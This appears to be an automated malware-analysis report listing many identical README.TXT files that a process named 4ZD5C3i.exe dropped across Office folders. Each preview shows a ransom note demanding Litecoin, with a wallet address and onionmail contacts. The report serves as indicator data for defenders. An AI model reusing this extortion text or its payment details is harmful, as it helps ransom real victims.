                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000099\assets\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000101\assets\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000104\Filter\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000104\UserActivityUX\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000105\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000106\_office_iss_excel_optimizeworkbook\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000106\_office_iss_excel_shared_ux\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000108\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000108\ReactNative\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000109\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000109\dist\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000113\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000117\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000118\assets\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000119\_office_iss_excel_shared_ux\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
